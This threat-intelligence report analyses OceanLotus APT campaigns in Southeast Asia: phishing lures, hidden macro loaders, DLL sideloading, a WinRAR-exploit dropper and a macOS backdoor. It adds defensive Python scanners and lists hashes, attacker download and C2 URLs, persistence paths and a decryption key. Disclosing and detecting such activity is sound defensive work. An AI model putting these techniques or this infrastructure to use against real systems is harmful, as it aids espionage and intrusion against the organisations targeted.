Overview
OceanLotus is an APT Group with alleged Vietnamese background. The group was first revealed and named by SkyEye Team in May 2015. Its attack activities can be traced back to April 2012. The targets include China's maritime institutions, maritime construction, scientific research institutes and shipping enterprises.
In fact, according to reports of various security vendors, OceanLotus also attacked several countries, including Cambodia, Thailand, Laos, even some victims in Vietnam, like opinion leaders, media, real estate companies, foreign enterprises and banks.
RedDrip Team (formerly SkyEye Team) has kept close track of OceanLotus group activity. We recently identified the initial-stage payload files and attack techniques used in the group's latest attacks against countries on the Indochinese Peninsula since 2019, and, combined with QiAnXin threat intelligence data, correlated them with a series of attacks.
In this report, we share our summary of the latest attack techniques, attack payloads and related attacks of OceanLotus, hoping to jointly improve understanding of OceanLotus, an extremely active APT group.
Attacks on Countries
The following is a list of typical cases of attacks against some countries on Indochinese Peninsula since the end of 2018. For other unmentioned samples, please refer to the IOC list at the end of this report.
Vietnam
Bait Compression Files
On April 1, 2019, during daily monitoring of OceanLotus attack activity, RedDrip discovered a compressed file with the Vietnamese name "Hop dong sungroup.rar".
The English translation is "Sun Group contract". The compressed package contains winword.exe renamed as "Noi dung chi tiet hop dong sungroup can chinh sua".
In addition, we correlated another decoy package, SUN_GROUP_CORPORATION, which translates as "Sun Group Corporation". The file name inside the zip package is as follows:
Noi dung can xac thuc va sua GUI den CONG TY CO PHAN TAP DOAN MAT TROI Bo Tai chinh.exe
It turned out that Sun City Group is actually one of the largest real estate developers in Vietnam.
Both samples were uploaded from Vietnam. We therefore speculate that OceanLotus carried out phishing attacks against Sun City internal staff.
In addition to targeting the Vietnamese real estate industry, we also found that the group conducts phishing attacks against the national bank of Vietnam:
The compressed package of the related samples is called cplh-nhnn-01-209.rar. The samples are dated January 22, 2019, and the attack most likely took place around the same period.
Translated, the compressed package name is "national bank of Vietnam -- 01-209.rar". The winword.exe in the package was renamed "chiphilienhoannhnn-bc209.exe", which translates as "state bank of Vietnam sbv-bc 209.exe".
SBV refers to Vietnam's central bank, the State Bank of Vietnam, while BC actually refers to B2C, or third-party payment.
This attack was likely launched against the bank's internal staff, disguised as a document transmission process similar to third-party payment handling within the bank.
Phishing lures also disguise themselves as antivirus-related information.
Compressed package name: "Gui lai cho MS.MAI post content kaspersky.rar" (return MS.MAI post content kaspersky)
We also see oil used as a phishing theme:
"Tinh dau can mua" (essential oil required); the PE file in the package is called "details about purchase and purchase"
Bait Documents
The compressed package above contains a Kaspersky-named bait, and there is a similarly named bait document, "Content marketing kaspersky.doc". After opening, the document appears as shown below, inducing the user to click the Vietnamese-language prompt to enable macros.
In addition, we found a large number of OceanLotus phishing campaigns disguised as resumes (CVs), which we internally named the OceanCV activity. This activity directly exposes all three macro attack methods commonly used by OceanLotus.
First, we analyze the sample names. All of them start with CV and follow a naming pattern. There are three main types:
1. CV-name (e.g., cv-nguyenquynhchi.docx)
2. CV-name-position (e.g., CV-AnthonyWei-customerservice.docx)
3. CV-random number + English (e.g., Cv-103237-ewqdsd.doc)
It is worth noting that some samples, once opened, display a prompt indicating the need to enable macros:
However, when you scroll down, you will find resumes written in Vietnamese; this is true for most of the samples in this series of activities, and the resumes are not consistent with one another.
These phishing resume samples use different methods. Some use the OceanLotus MSO macro (RedDrip internally named MSOMacro):
Some use template injection techniques:
Some use the technique of hiding the macro code in a 1-point font in the document (later upgraded to a white 1-point font; RedDrip internally named this OHNMacro).
In the following sections we will analyze each of these three macro techniques in detail.
Based on this batch of resume samples, we carried out homologous sample correlation for these three macro document types across various dimensions, and finally found a large number of malicious macro samples exclusive to OceanLotus. Please refer to the Office samples section for details.
Exploitation of EternalBlue Vulnerabilities
We also found that OceanLotus used the "EternalBlue" series of vulnerabilities to target companies in Vietnam that provide software to the government.
Website: https://www.tandan.com.vn/portal/home/default.aspx
TAN DAN JSC is a Vietnamese software company.
The company provides the government with mail servers, official gazette database systems, citizenship management systems and more.
After a successful attack, it distributes Trojans. These are consistent with the Trojans that used EternalBlue to attack colleges and universities, described in our report last year on the suspected early attack activities of OceanLotus against domestic colleges and universities:
https://ti.qianxin.com/blog/articles/oceanlotus-targets-chinese-university/
Phishing Attacks by Exploiting WinRAR Vulnerability
In addition to traditional malicious payloads that rely on the "white executable / black DLL" (DLL sideloading) mechanism, and payloads distributed through social media posts and websites, OceanLotus also takes advantage of the latest WinRAR vulnerability to launch attacks against Vietnam. Here is one of the cases we captured:
The package name is "tut_photoshop_scan_bank_id.rar".
The file extracted when the sample triggers the vulnerability is named CocCocUpated.exe.
Coc Coc is a Vietnamese technology company founded in 2013 that provides Internet search engine services and a browser, mainly in Vietnamese and English. Its search service is the most mature in Vietnam, and its browser is based on Google's Chromium and supports the Windows and iOS platforms.
Through analysis, we found that it is the early Trojan framework of OceanLotus; it is analyzed separately in the sample analysis section.
Beyond the baits above, we also found OceanLotus exploiting the vulnerability with a compressed package that embeds MP4 files. The package name translates roughly as "Cho Ray hospital exclusive blockbuster movie"; Cho Ray (Chợ Rẫy) is a hospital in Ho Chi Minh City, Vietnam's largest general hospital.
The package contains two MP4 files, one of which has the same name as the package, and a video whose title translates as "the team began staffing after the exclusive stroke press release".
Similarly, it drops coccocupdate.exe.
It was distributed by hosting it on a cloud storage (netdisk) service.
This new Trojan will be analyzed in detail in the sample analysis section.
MAC Backdoor
In addition to targeting Vietnam on the Windows platform, OceanLotus also attacks Vietnamese users on the macOS platform. The following samples are typical of recent campaigns; they use lures such as a browser update, a Flash installation update package, a font installation package, or a disguised document to get the user to actually run the attacker's installer.
Interestingly, when we analyzed the sample disguised as Firefox, it showed a Firefox installation interface after opening. Double-clicking the Firefox icon executes the Trojan:
When you click on the update, the download progress bar appears even if you are disconnected from the Internet.
This is the fake interface the attacker drew:
This batch of macOS samples targeting Vietnam is analyzed in more detail in the following chapters.
Cambodia
Here is this year's latest OceanLotus attack on Cambodia, using a document called "report-no.0162(02 Pages).doc".
The sample's operation process is shown in the following figure:
The samples associated by homology are as follows:
MD5 | Filename | Create time |
--- | --- | --- |
56b5a96b8582b32ad50d6b6d9e980ce7 | Request Comment on UYFC.doc | 2019-03-18 04:12:00 |
3fd2a37c3b8d9eb587c71ceb8e3bb085 | No.039714(cdri).doc | 2019-03-25 04:33:00 |
The sample associated with the Cambodia attack is Request Comment on UYFC.doc.
UYFC is actually a Cambodian youth federation NGO; the attack targets people who may be associated with the conference.
Document screenshot:
No.039714(cdri).doc
It is clear that the attack on Cambodia also used OHN macros.
In addition to the scanned-document lures, last year OceanLotus also targeted Cambodia with macOS samples. Related sample: "Scanned Investment report-july 2018.zip"
Thailand
Typical examples of OceanLotus attacks against Thailand since 2019 are as follows:
MD5 | Filename | Create time |
--- | --- | --- |
4c30e792218d5526f6499d235448bdd9 | Form_Provisional Agenda of the ASEAN Senior Officials Preparatory Meeting.doc | 2019-01-21 02:25:00 |
d8a5a375da7798be781cf3ea689ae7ab | Program Retreat.doc | 2019-01-14 03:50:00 |
The first is named Form_Provisional Agenda of the ASEAN Senior Officials Preparatory Meeting.
The meeting was actually held in Thailand on April 6, 2019. From the document's creation time and upload time (2019-03-22), it can be seen that OceanLotus has a strong ability to follow current affairs and a long preparation cycle.
The second document, Program Retreat, may target the military, but the name's broader meaning makes it impossible to be certain of the attacker's intent.
In addition, the document contents of the two files in the table above are identical. The following screenshot shows the document after restoring the shellcode font:
It also uses OHN macros.
Sample Analysis
MSO Macro Documents
OceanLotus's "MSO macro" samples share common traits. We analyzed one sample; the extracted macro code is as follows:
First it assembles the data through the Data variable; after base64 decoding, it obtains the VBS code, writes it to msohtml.log, and copies wscript.exe to Windows\SysWOW64\msohtml.exe:
It executes the msohtml.log script through the copied msohtml.exe (that is, wscript.exe), as shown in the figure below:
And creates scheduled tasks:
The contents of the msohtml.log script are as follows. It executes the data in the cs array after XORing each element with 518:
The decrypted script, shown in the figure, executes the malicious code after XORing the elements of its cs array with 415:
The decrypted malicious code, shown in the figure, downloads code from https://open.betaoffice.net/cvfemale.png and executes it.
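As an added illustration of the layered XOR scheme just described (this is example code written for this page, not the group's script or anything from the report), the following Python helper extracts a `cs = Array(...)` literal from a VBS-style script, XORs each element with the layer's key, and repeats for the next layer. The two-layer sample it peels is constructed here with the keys 518 and 415 from the text; the innermost stage is a harmless placeholder rather than the downloader.

```python
import re

# Constructed innermost stage (placeholder; the real final layer is the downloader).
FINAL_STAGE = 'MsgBox "stage 3 reached"'

ARRAY_RE = re.compile(r"cs\s*=\s*Array\(([\d,\s]+)\)", re.IGNORECASE)


def encode_stage(script: str, key: int) -> str:
    """Build a VBS-style 'cs = Array(...)' line whose elements are the script's
    character codes XORed with key (the inverse of what the loader does).
    Used only to construct sample data for this demo."""
    return "cs = Array(" + ",".join(str(ord(c) ^ key) for c in script) + ")"


def extract_array(script: str):
    """Pull the integer literal array out of a 'cs = Array(...)' statement, or None."""
    m = ARRAY_RE.search(script)
    if not m:
        return None
    return [int(x) for x in m.group(1).split(",")]


def decode_xor_array(values, key: int) -> str:
    """XOR each element with the layer key and rebuild the hidden script text."""
    return "".join(chr(v ^ key) for v in values)


def peel_layers(script: str, keys):
    """Decode successive cs arrays with the given key sequence.
    Returns every layer in order, outermost first; stops early when a layer
    no longer contains a cs array (so a wrong key simply ends the chain)."""
    layers = [script]
    for key in keys:
        values = extract_array(layers[-1])
        if values is None:
            break
        layers.append(decode_xor_array(values, key))
    return layers


# Constructed two-layer sample mirroring the msohtml.log structure:
# outer array XORed with 518 hides a script whose own array is XORed with 415.
STAGE2 = encode_stage(FINAL_STAGE, 415)
STAGE1 = encode_stage(STAGE2, 518)   # the "msohtml.log" equivalent

if __name__ == "__main__":
    for i, layer in enumerate(peel_layers(STAGE1, [518, 415])):
        print(f"layer {i}: {layer[:60]}")
```

The regex only handles a literal integer array; real scripts also carry the surrounding execution logic, which an analyst would strip or emulate separately.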
OHN Macro Documents
Extracting the macro code from the sample: when the Word document is opened it prompts to enable macros, and after macros are enabled this function executes:
It then copies the Office document to Temp under a random name, as shown in the figure:
Then it modifies the macro security settings in the registry:
It takes the data in the last five paragraphs of the document (5 paragraphs in total: 2 blank lines and 3 containing hex data), converts it from hex to binary, adds it to the macro code of the new file, and then sets the x_N0th1ngH3r3 method to execute the macro code after 1 second:
The data paragraphs are formatted as 1-point text, invisible to the naked eye, as shown in the figure:
The first paragraph's data after the formatting is cleared:
After the data is converted to binary, it becomes the second macro code; the first macro code executes the x_N0th1ngH3r3 function, as shown in the figure:
The macro code in the third-from-last paragraph is executed in the same way, as shown in the figure:
It also starts with this function:
It takes the data of the second-from-last paragraph, as shown in the figure:
The data are as follows:
Then it is written to memory for execution:
After the hex data is converted to binary, the shellcode commonly used by OceanLotus appears, as follows:
Configuration file:
This is how the shellcode is loaded through three layers of macros, mainly to evade static detection of the shellcode.
Template Injection Documents
OceanLotus's template injection documents follow a common pattern: after the document opens, it loads a remote template from XXX.XXX/XXX.PNG
and does the following:
To give an example of one of these attacks, fdsw.png is an Office compound document:
(d497bd06b34a046841bb63d3bf20e605)
It checks whether the SysWOW64\cmd.exe file exists to determine whether the system is 32-bit or 64-bit.
Depending on the system, the file is taken out of the cell, base64-decoded, and dropped to %appdata% main_background-png:
The hijacked CLSID is "{2dea658f-54c1-4227-af9b-260ab5fc3543}".
This CLSID belongs to the DLL being hijacked: %SystemRoot%\System32\playsndsrv.dll
This DLL is used to play sound.
The base64 content extracted from the cell is as follows:
It base64-decodes to a 32-bit PE. DllMain allocates 0x34aca bytes of memory, writes the shellcode at 0x10012760 into it, and executes it in a thread:
The shellcode passes a pointer to offset 0xfc8 as the parameter to the sub_160018 function:
The address at offset 0xfc8 holds the command-line argument and a PE:
The sub_160018 function mainly loads the following PE in memory and then executes it according to the command-line parameters passed. The figure below shows the PE's code for receiving the command-line parameters:
It requests the URL, DES-decrypts the downloaded data, and loads it in memory.
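Added example (not code from the report): a Python scanner for the two document tricks described above, the OHN macro's hex data hidden in 1-point or white runs, and a template-injection relationship pointing at an external URL. It builds a small constructed .docx in memory to run against; the hex string, the placeholder template URL `http://template.invalid/XXX.PNG` and the minimal file layout are assumptions for the demo.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
HEX_RE = re.compile(r"^[0-9A-Fa-f]{16,}$")   # long hex-only paragraph


def w(tag):
    """Qualified WordprocessingML tag name."""
    return f"{{{W_NS}}}{tag}"


def hidden_hex_paragraphs(document_xml: bytes, max_half_points: int = 2):
    """Return (paragraph_index, text) for paragraphs that carry a run formatted
    at or below max_half_points (w:sz is in half-points, so 2 == 1 pt) or in
    white, and whose whole text is a long hex string."""
    root = ET.fromstring(document_xml)
    findings = []
    for idx, para in enumerate(root.iter(w("p"))):
        text, tiny_or_white = "", False
        for run in para.iter(w("r")):
            rpr = run.find(w("rPr"))
            if rpr is not None:
                sz = rpr.find(w("sz"))
                color = rpr.find(w("color"))
                if sz is not None and int(sz.get(w("val"), "24")) <= max_half_points:
                    tiny_or_white = True
                if color is not None and color.get(w("val"), "").upper() == "FFFFFF":
                    tiny_or_white = True
            text += "".join(t.text or "" for t in run.iter(w("t")))
        text = text.replace(" ", "")
        if tiny_or_white and HEX_RE.match(text):
            findings.append((idx, text))
    return findings


def external_templates(rels_xml: bytes):
    """Targets of attachedTemplate relationships with TargetMode=External."""
    root = ET.fromstring(rels_xml)
    return [rel.get("Target") for rel in root.iter(f"{{{REL_NS}}}Relationship")
            if rel.get("Type") == ATTACHED_TEMPLATE and rel.get("TargetMode") == "External"]


def scan_docx(data: bytes):
    """Open a .docx (zip) from memory and report both indicators."""
    report = {"hidden_hex": [], "external_templates": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        if "word/document.xml" in names:
            report["hidden_hex"] = hidden_hex_paragraphs(z.read("word/document.xml"))
        if "word/_rels/settings.xml.rels" in names:
            report["external_templates"] = external_templates(z.read("word/_rels/settings.xml.rels"))
    return report


def build_sample_docx() -> bytes:
    """Constructed test document (not a real sample): a visible paragraph, a
    white 1-pt paragraph of hex, a normal paragraph, and an external template."""
    document_xml = f"""<?xml version="1.0" encoding="UTF-8"?>
<w:document xmlns:w="{W_NS}"><w:body>
<w:p><w:r><w:t>Curriculum vitae - Nguyen Van A</w:t></w:r></w:p>
<w:p><w:r><w:rPr><w:color w:val="FFFFFF"/><w:sz w:val="2"/></w:rPr>
<w:t>4D5A90000300000004000000FFFF0000</w:t></w:r></w:p>
<w:p><w:r><w:rPr><w:sz w:val="24"/></w:rPr><w:t>Normal text</w:t></w:r></w:p>
</w:body></w:document>"""
    rels_xml = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" Target="http://template.invalid/XXX.PNG" TargetMode="External"/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", document_xml)
        z.writestr("word/_rels/settings.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    print(scan_docx(build_sample_docx()))
```

A real triage pass would also dump `vbaProject.bin` for the macro that reads those paragraphs, but the two XML checks alone already surface both lure families without executing anything.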
Find more samples through association analysis:
Sort by compile time as follows:
Comparing the table, the command line of the first sample differs from the others, so it should come from a different attack. This sample is the annotated version, which loads shellcode in memory in the same way.
The PE embedded in the file is found in a hacker toolkit; its file name is CMD [w7][x64].
This sample's function is to execute McOds.exe (the file name of the white utility program used by OceanLotus) through the CMD [w7][x64].exe contained in the file; McOds.exe should be the file released earlier by the dropper.
This sample was uploaded from VN on July 31 with the file name msvchr.exe, so it should be aimed at Vietnam:
Through analysis and comparison of these samples, we know that they are used specifically to execute EXE files in memory and pass command-line parameters to the loader program. This is a new malicious code framework that has been in use for the last six months, developed specifically to evade static detection.
Two samples are 10 MB, with the end filled with 0x20 (space); they are inflated into large files to avoid being uploaded:
The way these samples load the shellcode differs slightly:
1. Most samples execute the shellcode by creating a thread
2. The earliest compiled version of the sample runs as a service, with comments, and creates the thread that executes the shellcode in ServiceMain
3. A small number of samples execute the shellcode directly on the main thread
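Added triage helper (example code, not from the report) for the inflated samples just described: it measures the trailing run of filler bytes, decides whether a file is padded, and hashes the file with the filler removed so that one payload padded to different sizes clusters under one hash. The fake body and the 0x20 filler are constructed for the demo; the size and ratio thresholds are assumptions.

```python
import hashlib

PAD_CANDIDATES = (0x20, 0x00)   # space and NUL, the fillers seen in practice


def trailing_pad(data: bytes):
    """Return (pad_byte, run_length) for the trailing run of a single filler
    byte, or (None, 0) if the file does not end in one."""
    if not data or data[-1] not in PAD_CANDIDATES:
        return None, 0
    pad = data[-1]
    run = len(data) - len(data.rstrip(bytes([pad])))
    return pad, run


def is_inflated(data: bytes, min_size: int = 1_000_000, min_ratio: float = 0.5) -> bool:
    """True when the file is at least min_size bytes and at least min_ratio of
    it is trailing filler, the pattern described for the 10 MB samples."""
    if not data:
        return False
    _, run = trailing_pad(data)
    return len(data) >= min_size and run / len(data) >= min_ratio


def stripped_body(data: bytes) -> bytes:
    """The file with its trailing filler removed."""
    _, run = trailing_pad(data)
    return data[:len(data) - run] if run else data


def body_md5(data: bytes) -> str:
    """MD5 of the stripped body, so padded variants of one payload share a hash."""
    return hashlib.md5(stripped_body(data)).hexdigest()


# Constructed samples (not real files): a fake ~1 KB "PE" body starting with
# MZ, padded with spaces to 10 KB and to 12 KB.
BODY = b"MZ" + bytes(range(256)) * 4
SAMPLE_10K = BODY + b"\x20" * (10_000 - len(BODY))
SAMPLE_12K = BODY + b"\x20" * (12_000 - len(BODY))

if __name__ == "__main__":
    for name, blob in (("10K", SAMPLE_10K), ("12K", SAMPLE_12K), ("body", BODY)):
        pad, run = trailing_pad(blob)
        print(f"{name}: size={len(blob)} pad={pad} run={run} "
              f"inflated={is_inflated(blob, min_size=10_000)} md5={body_md5(blob)}")
```

Whole-file hashes of the two padded variants differ, but `body_md5` gives the same value for both, which is what you want when clustering these samples.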
wwlib DLL Injection
Through analysis of the compressed package cplh-nhnn-01-2019.rar downloaded from Amazon AWS, we found that the package contains winword.exe.
They use the winword.exe "white executable" technique: by default, winword.exe loads wwlib.dll from the same directory.
Winword.exe is chosen for this technique because its icon is the Word icon and wwlib.dll can be hidden, so they only need to rename winword.exe.
The malicious code in wwlib.dll is in the FMain export function; winword.exe calls the FMain export by default, so the malicious code executes. It then base64-decodes the shellcode it carries and executes it in the main thread:
Location of the base64-encoded shellcode in the sample:
The decoded shellcode is loaded in the same way as the previous shellcode. The data at offset 0x6b6 is passed to the sub_16 function as the parameter:
The sub_16 function decrypts the data following 0x6b6, yielding the second shellcode, and executes it. The figure below shows the decrypted second shellcode:
The second shellcode DES-decrypts the third layer with the key "asfahdiuqhu93ye7891h9ubioufcf":
The third layer of shellcode has the same entry as the previous two: it also uses the call/pop technique to find its loaded position in memory, then passes the data following the code (offset 0x8c6) as the parameter to the sub_16 function. The parameter passed is https://office.allsafebrowsing.com/AwPT:
The shellcode downloads a file from https://office.allsafebrowsing.com/AwPT and executes it in memory. The image below shows the User-Agent used for the download:
The downloaded AwPT file is a Cobalt Strike shellcode module:
The following figure shows the algorithm that decrypts the data attached at the end. It is the same as the Cobalt Strike shellcode module's, except that the shift moves 8 bytes backward:
The decrypted data is a beacon module, as shown in the figure:
The extracted configuration information is as follows:
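Added detection example, not from the report: given Sysmon Event ID 7 (ImageLoad) records as JSON lines, flag wwlib.dll loaded from a directory that is not an Office install path, and annotate the classic sideload signs (DLL beside the host process, host process not named winword.exe, DLL unsigned). The Office directory list and the three sample events are constructed assumptions; event 2 reuses the renamed-winword lure name from the text.

```python
import json
from pathlib import PureWindowsPath

# Directories where a genuine wwlib.dll is expected (assumed defaults; extend
# with your environment's actual Office install paths).
OFFICE_DIRS = (
    r"c:\program files\microsoft office",
    r"c:\program files (x86)\microsoft office",
)


def in_office_dir(path: str) -> bool:
    return any(path.lower().startswith(d) for d in OFFICE_DIRS)


def detect_wwlib_sideload(event: dict):
    """Inspect one Sysmon Event ID 7 (ImageLoad) style record.
    Returns a reason string when wwlib.dll is loaded from outside an Office
    directory, otherwise None."""
    image = PureWindowsPath(event.get("Image", ""))
    loaded = PureWindowsPath(event.get("ImageLoaded", ""))
    if loaded.name.lower() != "wwlib.dll":
        return None
    if in_office_dir(str(loaded)):
        return None
    notes = [f"wwlib.dll loaded from non-Office path {loaded}"]
    if loaded.parent == image.parent:      # PureWindowsPath compares case-insensitively
        notes.append(f"DLL sits beside the host process {image.name} (search-order sideload)")
    if image.name.lower() != "winword.exe":
        notes.append("host process is not named winword.exe (renamed white executable)")
    if str(event.get("Signed", "")).lower() == "false":
        notes.append("DLL is unsigned")
    return "; ".join(notes)


def scan_image_loads(lines):
    """Run the detector over JSON lines; return [(line_no, reason), ...]."""
    hits = []
    for n, line in enumerate(lines, 1):
        reason = detect_wwlib_sideload(json.loads(line))
        if reason:
            hits.append((n, reason))
    return hits


# Constructed sample events (not real telemetry). Event 2 mirrors the lure in
# the text: a renamed winword.exe with wwlib.dll dropped alongside it.
SAMPLE_EVENTS = [
    json.dumps({"EventID": 7,
                "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                "ImageLoaded": r"C:\Program Files\Microsoft Office\root\Office16\wwlib.dll",
                "Signed": "true"}),
    json.dumps({"EventID": 7,
                "Image": r"C:\Users\user\Downloads\cplh\chiphilienhoannhnn-bc209.exe",
                "ImageLoaded": r"C:\Users\user\Downloads\cplh\wwlib.dll",
                "Signed": "false"}),
    json.dumps({"EventID": 7,
                "Image": r"C:\Windows\System32\notepad.exe",
                "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
                "Signed": "true"}),
]

if __name__ == "__main__":
    for n, reason in scan_image_loads(SAMPLE_EVENTS):
        print(f"event {n}: {reason}")
```

The same logic ports directly to a Sigma or EDR query: ImageLoaded ends with `\wwlib.dll` and does not start with an Office install path.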
MAC Backdoor
The analysis object is a Mac backdoor disguised as a browser.
The extracted file structure is as follows; it is a macOS installation package, as shown in the figure:
After opening it, the Firefox installation interface is displayed. Double-clicking the Firefox icon executes the Dropper process:
It pops up a fake Firefox interface; when the user clicks update, the download progress bar appears even if the Internet is disconnected, because the attacker forged it:
This is the fake interface the attacker drew:
After running, the Dropper creates the following launch agent in the Library directory so that it starts at login:
/Users/username/Library/LaunchAgents/com.apple.spell.agent.plist
The launch agent points to the file /Users/username/Library/Spelling/spellagentd, an OS X binary. Its code is packed; it decrypts shellcode in memory and executes it, as shown in the figure:
After execution it connects back to rio.imbandaad.com, sending packets to the server through a POST request: http://rio.imbandaad.com/v3/yQ/r/eiCu1gd6Qme.js
However, the address is no longer valid. The App's signature information is as follows:
CocCocUpdate
CocCocUpdate is a Dropper that is released into the startup directory by a compressed package constructed to exploit the CVE-2018-20250 WinRAR vulnerability. The screenshot of the compressed package is as follows:
After a restart, the system executes it; the corresponding file is coccocupdate.exe. In 2015 we exposed a Dropper version that passed a random key through command-line parameters. This coccocupdate.exe is improved to pass the random key through environment variables.
The specific steps are as follows:
1. Gets the full path of the executing coccocupdate.exe and stores it in an environment variable named "C091A8C8" for later reading.
2. Randomly generates a 128-byte key and stores it in an environment variable named "DB99050C"; the key is used to encrypt the shellcode data that follows.
3. Encrypts the data at 0x40E000 with the random key, writes the modified PE file to the Temp directory, and then executes it through CreateProcess:
The following figure shows the comparison between the original file and the encrypted file. The code section is unchanged; only the global variable array at 0xd000 is encrypted by the random key.
4. If the file is bundled, it decrypts and releases a bundled file (the key is in the last 64 bytes) from a resource of type 10, ID 1, such as a Word document or another normal file, and executes it through ShellExecute. This file does not release a bundled decoy file, so the resource ID is wrong:
5. The executed Temp process first checks whether the "C091A8C8" environment variable is set. If so (meaning it was encrypted by the original Dropper), it reads the randomly generated 128-bit key from the "DB99050C" environment variable, decrypts the code at 0x40e000, then decrypts one more layer and decompresses one more layer, because the code has one layer of encryption and compression in the original Dropper:
Extract:
6. The decrypted file is a PE file, which is executed in memory after decryption, as shown in the figure:
This code releases 3 files to the c:\program files\Microsoft\Windows\system restore\ directory:
Then it creates a service pointing to the rstrui.exe file:
Rstrui.exe is a loader written by the attacker, disguised with the Microsoft Windows System Restore icon:
It is mainly responsible for loading {9fbaa883-1709-4de3-8c1b-48683f740a5f} from the same directory through rundll32.
The file named {9fbaa883-1709-4de3-8c1b-48683f740a5f}.clsid is a DLL loader; its PE information is as follows:
This DLL's main function is to decrypt and load the shellcode from the file in the same directory named {9fbaa883-1709-4de3-8c1b-48683f740a5f}, as shown in the figure:
Entering the sub_10001480 function, the file contents are decrypted and the PE is loaded in memory:
The decrypted PE in memory is shown in the figure below:
DllMain creates a thread to execute the export function Version. In the Version function, the remote-control routine runs continuously; if it fails, it sleeps 6 s and continues.
Then a random number less than 4 is generated and a C2 is selected accordingly, as shown in the figure:
One of the functions that decrypts a C2 is as follows:
The 4 domain names are as follows:
images.ucange.com
preload.ointalt.com
maintenance.allidayser.com
report.cottallid.com
The hashes of the samples associated with these domain names are as follows:
2ea902abe453b70cf77e402cc16eb552
cc7b9ee1b026e16a9d37e3988a714479
e60c35dd36c9f525007955e6b3a88b82
Bundled files in these homologous samples:
The Office file bundled in cc7b9ee1b026e16a9d37e3988a714479 has the following content:
Translation:
The Office file bundled in 2ea902abe453b70cf77e402cc16eb552 has the following content:
Translation:
The flow chart of the Dropper is as follows:
A comparison between this version of the Dropper and the 2015 version:
1. The 2015 Dropper passed the randomly generated decryption key through a command-line parameter, while this version passes the key between the processes in the chain through environment variables (the APIs are SetEnvironmentVariableW and GetEnvironmentVariableW).
2. The 2015 version detected virtual machines; this version has no virtual machine detection.
The following figure shows the 2015 OceanLotus Dropper passing the key through "--ping":
The following figure shows this Dropper version storing the randomly generated key in an environment variable:
Correlation Analysis
Trojan Samples
Through the analysis of the general backdoor of OceanLotus, a large number of homologous samples were found through the features in its code:
MD5 | Compile time | File size | Module name |
--- | --- | --- | --- |
ac5f18f1c20901472d4708bd06a2d191 | 2018-06-13 11:33:33 | 93184 | DllHijack.dll |
221e9962c9e7da3646619ccc47338ee8 | 2018-06-25 02:35:46 | 93184 | DllHijack.dll |
26ea45578e05040deb0cc46ea3103184 | 2018-07-02 02:11:55 | 142336 | DllHijack.dll |
200033d043c13b88d121f2c1d8d2dfdf | 2018-07-09 03:00:10 | 2053632 | DllHijack.dll |
9972111cc944d20c9b315fd56eb3a177 | 2018-07-13 03:48:03 | 142336 | DllHijack.dll |
bf040c081ad1b051fdf3e8ba458d3a9c | 2018-07-23 03:11:16 | 93184 | DllHijack.dll |
6c2a8612c6511df2876bdb124c33d3e1 | 2018-07-23 04:50:51 | 93184 | DllHijack.dll |
7dace8f91a35766e9c66dd6258552b02 | 2018-07-23 12:59:23 | 142336 | DllHijack.dll |
c9093362a83b0e7672a161fd9ef9498a | 2018-08-07 03:12:39 | 92672 | DllHijack.dll |
38f9655c72474b6c97dc9db9b3609677 | 2018-08-09 10:11:58 | 93184 | DllHijack.dll |
4bb4d19b42e74bd11459c9358c1a6f01 | 2018-08-13 02:21:13 | 168960 | DllHijack.dll |
f42611ac0ea2c66d9f27ae14706c1b00 | 2018-08-13 08:46:56 | 92672 | DllHijack.dll |
c28abdfe45590af0ef5c4e7a96d4b979 | 2018-08-15 03:20:08 | 92672 | DllHijack.dll |
cf0b74fe79156694a2e3ea81e3bb1f85 | 2018-08-20 02:12:34 | 92672 | DllHijack.dll |
c78fd680494b505525d706c285d5ebce | 2018-08-20 02:23:12 | 92672 | DllHijack.dll |
77390c852addc3581d14acf06991982e | 2018-08-29 03:20:46 | 168960 | DllHijack.dll |
49e969a9312ee2ae639002716276073f | 2018-08-29 03:50:11 | 93184 | DllHijack.dll |
f5ad93917cd5b119f82b52a0d62f4a93 | 2018-08-30 08:22:15 | 129536 | DllHijack.dll |
6291eabf6a8c58cad6a04879b7ba229f | 2018-09-04 02:24:06 | 92672 | DllHijack.dll |
9a10292157ac3748212fb77769873f6c | 2018-09-04 02:42:21 | 129536 | DllHijack.dll |
a406626173132c8bd6fe52672deacbe7 | 2018-09-06 02:03:30 | 92672 | DllHijack.dll |
93c3d6cffdcb0a2f29844ff130a920be | 2018-09-06 08:01:41 | 129536 | DllHijack.dll |
6b8fc8c9fe4f4ef90b2fcbcc0d24cfc9 | 2018-09-10 02:44:30 | 119296 | DllHijack.dll |
1211dea7b68129d48513662e546c6e21 | 2018-09-11 03:06:50 | 92672 | DllHijack.dll |
2f1f8142d479a1daf3cbd404c7c22f9f | 2018-09-17 04:12:57 | 111616 | DllHijack.dll |
0f877ad5464fcbb12e1c019adf7065cc | 2018-09-18 02:24:47 | 92672 | DllHijack.dll |
cab262b84dbd319f3df84f221e5c451f | 2018-09-18 03:00:51 | 111616 | DllHijack.dll |
07ff4f943b202f4e16c227679d9b598a | 2018-09-19 02:01:04 | 92672 | DllHijack.dll |
7a6ba3e26c86f3366f544f4553c9d00a | 2018-09-24 07:12:34 | 93184 | DllHijack.dll |
518f52aabd9a059d181bfe864097091e | 2018-09-25 02:59:04 | 111616 | DllHijack.dll |
70a64ae401c0a5f091b5382dea2432df | 2018-10-03 04:17:51 | 111616 | DllHijack.dll |
d40b4277e0d417e2e0cff47458ddd62d | 2018-10-09 03:22:19 | 95232 | DllHijack.dll |
5f1bc795aa784f781d91acc97bec6644 | 2018-10-17 08:02:50 | 209412 | DllHijack.dll |
305d992821740a9cbbda9b3a2b50a67c | 2018-10-22 03:27:24 | 92672 | DllHijack.dll |
